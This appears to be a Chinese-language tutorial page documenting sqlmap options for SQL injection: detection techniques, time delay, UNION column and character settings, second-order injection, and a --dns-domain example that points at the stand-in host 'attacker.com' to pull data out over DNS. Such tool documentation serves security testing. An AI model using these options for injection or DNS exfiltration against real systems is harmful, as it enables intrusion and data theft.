--technique
指定sqlmap使用的检测技术,默认情况下会测试所有的方式。
Boolean-based blind
Error-based
Union query-based
Stacked queries(对文件系统、操作系统、注册表操作时,必须指定该方式)
Time-based blind
--time-sec
设置延迟时间,基于时间的注入检测默认延迟时间是5秒
--union-cols
联合查询时默认是1-10列,当level=5时会增加到测试50个字段数,可以使用此参数设置查询的字段数。
--union-char
默认情况下sqlmap针对UNION查询的注入会使用NULL字符;
有些情况下使用NULL字符会造成页面返回失败,而使用一个随机整数是成功的,可以使用--union-char指定UNION查询的字符。
--dns-domain
攻击者控制了某DNS服务器,使用此功能可以提高数据查询的速度
例如:--dns-domain="attacker.com"
--second-order
有些时候注入点输入的数据,返回的结果并不是当前页面,而是另外一个页面。
使用此参数指定到哪个页面获取响应判断真假,--second-order后面跟一个判断页面的URL地址。例如:
--second-order="http://1.1.1.1/a.php"
网友评论